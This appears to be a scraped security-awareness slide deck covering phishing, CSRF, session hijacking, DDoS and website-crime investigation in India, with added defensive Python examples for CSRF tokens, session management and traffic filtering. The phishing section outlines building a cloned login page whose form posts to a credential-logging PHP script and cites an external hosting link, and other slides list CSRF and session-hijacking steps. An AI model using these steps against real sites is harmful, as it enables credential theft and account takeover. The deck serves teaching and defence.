Phishing is the act of sending an email to a user, falsely claiming to be an
established legitimate enterprise, in an attempt to scam the user into
surrendering private information that will be used for identity theft.
- 111. Phishing Types
Spear Phishing
Clone Phishing
Whaling
___________________________________________________________
Spear Phishing
Phishing attempts directed at specific individuals or companies are
termed spear phishing. Attackers gather personal information about their
target to increase their probability of success. This technique is by far the
most successful on the internet today; one industry estimate attributes
91% of attacks to it.
- 112. Clone Phishing
A type of phishing attack where a legitimate email containing an attachment or link has
had its content and recipient address taken and used to create an almost identical, or
cloned, email. The attachment or link within the email is replaced with a malicious
version and then sent from an email address spoofed to appear to come from the
original sender. It may claim to be a re-send of the original or an updated version of
the original.
Whaling
Several recent phishing attacks have been directed specifically at senior executives and
other high-profile targets within businesses, and the term whaling has been coined for
these kinds of attacks.
- 113. HERE'S HOW IT'S DONE
Step 1:
Set up a web page that looks similar to the original one.
Link: http://a0145877.xsph.ru/
- 114. Step 2:
A PHP script that writes submitted credentials to a file is what is
required to harvest them.
- 115. Step 3:
In the HTML page, find the login form and change its action so that
it submits to the PHP script instead of the real site.
- 121. DEFINITION
Phishing is the attempt to obtain sensitive information
such as usernames, passwords and credit card
details, often for malicious reasons, by disguising
as a trustworthy entity in an electronic
communication.
TYPES OF PHISHING
• Spear phishing
• Clone phishing
• Whaling
• Filter evasion
• Link manipulation
• Tabnabbing
- 125. How to protect yourself
1. Be wary of emails asking for confidential information.
2. Make sure you familiarise yourself with a website's privacy
policy.
3. Watch out for generic-looking requests for information.
4. Never submit confidential information via forms embedded
within email messages.
5. Never use links in an email to connect to a website unless you
are absolutely sure they are authentic. Instead, open a new
browser window and type the URL directly into the address bar.
6. Make sure you maintain effective software to combat phishing.
- 130. Web Browser's Password Database
Random passwords are generated and stored in the browser.
This is more "secure" against phishing, because the browser only offers
the saved credentials to the exact origin they were saved for. If anything
in the origin differs, as on a look-alike phishing domain, it will not fill them in.
Disadvantages:
• It does not work fully across sub-domains.
• The stored passwords can still be read back in clear by anyone who can
run code as the logged-in user, since the browser must be able to
decrypt them to fill them in.
- 131. Phishing Scam Alert Add-ons/Extensions
The concept is this: if the user visits any known
fake/phishing URL, the toolbar turns red.
- 132. Phishing Scam Alert Add-ons/Extensions
If the site is merely suspected of being a phishing or fake site, it turns
yellow.
- 134. Encrypted Key Exchange: Preventing
Dictionary Attacks
A series of protocols (EKE and its successors) implement encrypted key
exchange.
The session key is derived from the shared password in such a way that
an eavesdropper, or a phisher who only observes the exchange, cannot
recover the password or test guesses against it offline.
These protocols were awkward to implement and use, and
they were also too time-consuming.
- 135. Educating Your People
Conduct seminars and workshops on ethical hacking and
Internet security in order to educate employees.
This can be a quality step towards security awareness.
Awareness has to be raised at the level of reasoning, not just rules:
people should understand why a request looks suspicious.
- 138. Definition
Cross-Site Request Forgery (CSRF) is an attack that forces an
end user to execute unwanted actions on a web application in
which they're currently authenticated.
CSRF attacks specifically target state-changing requests, not
theft of data, since the attacker has no way to see the response
to the forged request.
- 139. Definition Cont...
With a little help of social engineering (such as sending a link via email
or chat), an attacker may trick the users of a web application into
executing actions of the attacker's choosing.
If the victim is a normal user, a successful CSRF attack can force the
user to perform state changing requests like transferring funds,
changing their email address, and so forth.
If the victim is an administrative account, CSRF can compromise the
entire web application.
- 140. Process
Root cause of CSRF
Existing browsers do not check whether the user actually intended to
initiate an HTTP request: any request to the target site carries the
target's cookies, no matter which page issued it.
Sequence (Malicious Website / Browser / Target Website):
1. The browser sends a login request to the target website.
2. The target website returns the login response with session cookies.
3. The user visits the malicious website.
4. The malicious website returns malicious code (for example an
auto-submitting form or an image tag pointing at the target).
5. The browser sends the forged request to the target website,
automatically attaching the cookies.
- 141. Screenshot
Step 1: Let us perform a CSRF forgery by embedding JavaScript in an
image. The snapshot of the problem is listed below.
- 142. Screenshot
Step 2: Now we need to mock up the transfer as a 1x1 image and
make the victim load it.
- 143. Screenshot
Step 3: Upon submitting the message, the message is displayed as
highlighted below.
- 144. Screenshot
Step 4: Now if the victim clicks the following URL, the transfer is
executed, which can be confirmed by intercepting the user action with
Burp Suite. We are able to see the transfer in the GET request, as
shown below.
Step 5: Now, upon clicking refresh, the lesson completion mark is
shown.
- 145. Tool – OWASP CSRF Tester
Test your applications for CSRF
-Record and replay transactions
-Tune the recorded test case
-Run test case with exported HTML document
Test case alternatives
-Auto-Posting Forms
-Evil iFrame
-IMG Tag
-XMLHTTPRequest
-Link
- 146. Counter Measures
The web application should insert random values, tied to the
user's session, into the forms it generates.
The web application should re-authenticate the user every time they
are about to perform a particularly dangerous operation.
- 147. Counter Measures Cont..
Safe Methods
1) The GET and HEAD methods SHOULD NOT have the significance of
taking an action other than retrieval. These methods ought to be
considered "safe" ...
Read state-changing input from the $_POST superglobal, not from $_GET or $_REQUEST
2) Try to force the use of your own forms
- On form generation, store a unique token in the user's $_SESSION and in a
hidden form field
- On submit, check the token
-- Limits the attack to a single user
-- The attacker would need to obtain the user's valid form AND session token
- Put an expiry on form tokens
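The token scheme in these countermeasure slides, as an added example written for this page (it is not the deck's code and does not use PHP's $_SESSION): the token is an HMAC of the session ID and an issue time under a server secret, so it is bound to one session, expires, and can be verified without storing anything server-side. SERVER_SECRET is generated at start-up here for the demo; in a real deployment it would be loaded from configuration. handle_transfer() is a hypothetical state-changing endpoint.

```python
"""Session-bound, expiring CSRF tokens (added example)."""
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Assumption: per-deployment secret from config; random at start-up for the demo.
SERVER_SECRET = secrets.token_bytes(32)
TOKEN_TTL = 3600  # seconds; the slide's "put expiry on form tokens"


def _mac(session_id: str, ts: str) -> str:
    return hmac.new(SERVER_SECRET, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()


def issue_token(session_id: str, now: Optional[int] = None) -> str:
    """Token = issue_time.HMAC(secret, session_id:issue_time).
    Binding to the session means a token the attacker obtains from their own
    session will not verify against the victim's."""
    ts = str(int(time.time() if now is None else now))
    return f"{ts}.{_mac(session_id, ts)}"


def verify_token(session_id: str, token: str, now: Optional[int] = None) -> bool:
    """Reject malformed, expired, future-dated, or wrong-session tokens."""
    try:
        ts, mac = token.split(".", 1)
        ts_int = int(ts)
    except ValueError:
        return False
    current = int(time.time() if now is None else now)
    if ts_int > current or current - ts_int > TOKEN_TTL:
        return False
    # Constant-time comparison so the MAC cannot be guessed byte by byte.
    return hmac.compare_digest(mac, _mac(session_id, ts))


def handle_transfer(method: str, session_id: str, form: dict) -> str:
    """Hypothetical state-changing endpoint: POST only, token required."""
    if method != "POST":
        return "405 Method Not Allowed"
    if not verify_token(session_id, form.get("csrf_token", "")):
        return "403 Forbidden"
    return "200 transfer done"


if __name__ == "__main__":
    sid = "sess-alice"
    token = issue_token(sid)             # embedded in the hidden field of the form
    print(handle_transfer("POST", sid, {"csrf_token": token}))
    print(handle_transfer("POST", sid, {}))   # forged request carries no token
    print(handle_transfer("GET", sid, {"csrf_token": token}))
```

The forged request in the process slide still arrives with the victim's cookies, but the attacker's page cannot read the token out of the victim's form (same-origin policy), so the POST fails the check. Setting the session cookie with SameSite=Lax or Strict removes the cookie from cross-site requests altogether and is a complementary defence.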
- 149. What is session hijacking ?
Session hijacking is the process of exploiting valid computer session
which involves stealing the victim's cookie.
- 150. What is a cookie ?
• A cookie, also known as a web cookie or HTTP cookie, is a small piece of text
stored by the user's browser.
• A cookie is sent as a header by the web server to the web browser on the
client side.
• A cookie is static and is sent back by the browser unchanged every time it
accesses the server.
- 151. Types of session hijacking
1 ) Active : -
In an active attack, an attacker finds an active session and takes it over.
2 ) Passive : -
In a passive attack, an attacker hijacks a session, but sits back, and
watches and records all the traffic that is being sent back and forth
- 156. Session Hijacking
Levels of Session Hijacking
Session Hijacking Steps
Types of Session Hijacking
Session Hijacking Tools
Countermeasures
- 157. Steps in Session Hijacking
Place yourself between the victim and the target
(you must be able to sniff the network)
Monitor the flow of packets
Predict the sequence number
Kill the connection to the victim’s machine
Take over the session
Start injecting packets to the target server
- 158. Types of Session Hijacking
There are two types of session hijacking attacks:
Active
• In an active attack, an attacker finds an
active session and takes it over
Passive
• In a passive attack, an attacker hijacks a
session, but sits back, and watches and
records all the traffic that is being sent
back and forth
- 159. Session Hijacking Levels
Session hijacking takes place at two levels:
• Network Level Hijacking
• Application Level Hijacking
Network level hijacking is the interception of packets during
transmission between the client and the server in a TCP or UDP session
Application level hijacking is about gaining control of an HTTP user session by obtaining the
session ID
- 160. Some common tools used for Session
Hijacking
The following are a few that
belong to this category:
• Juggernaut
• Hunt
• TTY Watcher
• IP Watcher
• T-Sight
• Paros HTTP Hijacker
- 161. Counter Measures for Session
Hijacking
Use encryption
Use secure protocols (SSL/TLS and
HTTPS)
Limit incoming connections
where possible
Minimize remote access
Set a timeout so the session expires
when inactive
Expire the session if the browsing
agent (User-Agent) changes
Provide logout functionality
- 162. Counter Measures for Session
Hijacking (Cont….)
Create a new session ID after
authoritative login
Use long session IDs
Force re-authentication or step-
up authentication
Use CAPTCHA challenges
Educate the employees
Expire the session if the operating
system changes
Expire the session if the
device changes (Web Socket)
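As an added example (not from the slides), a small server-side session store that applies several of the countermeasures listed on these two slides: long random IDs, a fresh ID issued after authoritative login, an inactivity timeout, expiry when the browsing agent (User-Agent) changes, and an explicit logout. Timestamps are passed in explicitly so the behaviour is deterministic; `IDLE_TIMEOUT` and the method names are assumptions.

```python
import secrets

IDLE_TIMEOUT = 900  # seconds of inactivity before a session expires (assumed)


class SessionStore:
    def __init__(self):
        # session id -> {"user", "agent", "last_seen"}
        self._sessions = {}

    def _new_id(self):
        return secrets.token_urlsafe(32)  # 256 random bits, URL-safe text

    def create(self, user_agent, now):
        """Anonymous (pre-login) session with a long unpredictable ID."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "agent": user_agent, "last_seen": now}
        return sid

    def login(self, sid, user, user_agent, now):
        """Regenerate the ID at authoritative login so an ID captured or
        planted before authentication is useless afterwards."""
        if self.validate(sid, user_agent, now) is None:
            return None
        del self._sessions[sid]
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "agent": user_agent, "last_seen": now}
        return new_sid

    def validate(self, sid, user_agent, now):
        """Return the session data if `sid` is live; otherwise destroy it
        and return None (unknown id, idle timeout, or agent change)."""
        data = self._sessions.get(sid)
        if data is None:
            return None
        if now - data["last_seen"] > IDLE_TIMEOUT or data["agent"] != user_agent:
            del self._sessions[sid]  # possible hijack or stale session: force logout
            return None
        data["last_seen"] = now
        return data

    def logout(self, sid):
        """Explicit logout invalidates the ID server-side, not just client-side."""
        return self._sessions.pop(sid, None) is not None
```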
- 164. What is Distributed Denial of Service?
A denial-of-service attack (DoS attack) is a cyber-attack where the
perpetrator seeks to make a machine or network resource unavailable to
its intended users by temporarily or indefinitely disrupting services of
a host connected to the Internet. Denial of service is typically
accomplished by flooding the targeted machine or resource with
superfluous requests in an attempt to overload systems and prevent some
or all legitimate requests from being fulfilled.
- 167. Volume Based Attacks
Includes UDP floods, ICMP floods, and other spoofed-packet floods. The
attack's goal is to saturate the bandwidth of the attacked site, and
magnitude is measured in bits per second (bps).
- 168. Protocol Attacks
Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf
DDoS and more. This type of attack consumes actual server resources, or
those of intermediate communication equipment, such as firewalls and
load balancers, and is measured in Packets per second.
- 169. Application Layer Attacks
Includes low-and-slow attacks, GET/POST floods, attacks that target
Apache, Windows or OpenBSD vulnerabilities and more. Made up of
seemingly legitimate and innocent requests, the goal of these attacks is to
crash the web server, and the magnitude is measured in requests per
second.
- 171. Prevention and Mitigation Strategy
The first thing to do in DDoS mitigation is to identify normal conditions for
network traffic by defining "traffic patterns", which is necessary for threat
detection and alerting. DDoS mitigation also requires classifying incoming
traffic to separate human traffic from human-like bots and hijacked web
browsers. This is done by comparing signatures and examining
different attributes of the traffic, including IP addresses, cookie variations,
HTTP headers, and JavaScript footprints.
One technique is to pass network traffic addressed to a potential target
network through high-capacity networks with "traffic scrubbing" filters.
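As an added example (not from the slides), a minimal triage pass in the spirit of the strategy above: a per-client requests-per-second threshold (the "traffic pattern") is learned from known-normal traffic, and live traffic is then checked against it, with two of the attributes mentioned (cookie presence and a marker cookie that page JavaScript would set) recorded as supporting evidence. The log format, the `jsok` marker cookie, the client addresses and all sample lines are constructed for this example.

```python
import statistics
from collections import Counter, defaultdict


def parse(line):
    """Constructed log format: '<second> <client> <Cookie header or ->'."""
    sec, client, cookie = line.split(" ", 2)
    cookies = dict(kv.split("=", 1) for kv in cookie.split(";") if "=" in kv)
    return int(sec), client, cookies


def baseline(normal_lines, k=3.0):
    """Learn the 'traffic pattern': per-client requests/second threshold
    = mean + k * stdev, measured over known-normal traffic."""
    per_sec = Counter((s, c) for s, c, _ in map(parse, normal_lines))
    rates = list(per_sec.values())
    return statistics.mean(rates) + k * statistics.pstdev(rates)


def score(live_lines, threshold):
    """Return {client: reasons} for clients whose peak rate exceeds the
    baseline; reasons also note bot-like attributes (no cookies at all, or
    never carrying the 'jsok' cookie that the page's JavaScript sets)."""
    per_sec = defaultdict(Counter)
    total, no_cookie, no_js = Counter(), Counter(), Counter()
    for s, c, cookies in map(parse, live_lines):
        per_sec[c][s] += 1
        total[c] += 1
        no_cookie[c] += not cookies
        no_js[c] += "jsok" not in cookies
    flagged = {}
    for c, secs in per_sec.items():
        if max(secs.values()) <= threshold:
            continue  # within the learned normal pattern
        reasons = ["rate"]
        if no_cookie[c] == total[c]:
            reasons.append("no-cookie")
        if no_js[c] == total[c]:
            reasons.append("no-js-footprint")
        flagged[c] = reasons
    return flagged


# Constructed samples: three clients at 1 req/s and one at 2 req/s for 10 s.
NORMAL = [f"{t} 10.0.0.{i} sid=s{i};jsok=1" for t in range(10) for i in (1, 2, 3)]
NORMAL += [f"{t} 10.0.0.4 sid=s4;jsok=1" for t in range(10) for _ in range(2)]
LIVE = [f"{t} 10.0.0.9 sid=s9;jsok=1" for t in range(10) for _ in range(2)]
LIVE += ["5 198.51.100.7 -" for _ in range(40)]             # flood, no cookies
LIVE += ["5 203.0.113.5 sid=x;jsok=1" for _ in range(40)]   # flood with cookies

if __name__ == "__main__":
    print(score(LIVE, baseline(NORMAL)))
```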
- 173. INVESTIGATION
Challenges in the investigation of Cyber Crime (Website Crime)
Investigation of cyber-crimes is different from conventional
investigation because:
The incident takes place in the virtual world
It is borderless/transnational
There are issues of jurisdiction
There is the issue of connecting the accused with the
machine/computer
There is a lack of enthusiasm in reporting cyber crime
- 174. The essential Requirements for Investigation are:
Immediate Reporting of Breaches.
Adequate Tools.
Trained Investigators.
Computer Literate Witness.
Assistance of Forensic Experts.
Immediate investigation.
Common Procedure of Web Site Crime Investigation
WHOIS lookup and domain details: if the domain is active it must
have a working email address and payment details;
contact the registrar, who can give the domain's IP address,
cell number and payment instrument.
- 175. The email ID used for the hosting server is important because
police can obtain the email ID, creation IP, alternate email ID, cell
number and IP logs.
A law enforcement agency in India can demand
information such as IP logs and login credentials of the accused for
investigation under Section 91 of CrPC 1973; for detailed
information on Section 91 of CrPC 1973 kindly refer to the
annexure.
The law enforcement agencies can perform a detailed
investigation of cyber crime cases through the Internet
Protocol Data Record (IPDR) of the network used. The IPDR
can be obtained from the ISP of the concerned network. A
sample IPDR is shown in the figure.
- 178. Crimes and Laws Relating to Websites.
Harassment via fake public profile on social networking
site.
Online Hate Community.
Email Account Hacking.
Web Defacement.
Introducing Viruses, Worms, Backdoors, Rootkits, Trojans,
Bugs.
Cyber Terrorism.
Phishing and Email Scams.
Theft of Confidential Information.
- 179. WEBSITE HACKING CASE STUDY
Hacking and defacement of Assam police website.
Hacker hacks into a financial website.
Indian Army website hacked.
ISRO Website Hack.
Bazee.com
E-Bay Account Takeover
Incometaxpune.Com Redirection To Pornographic Content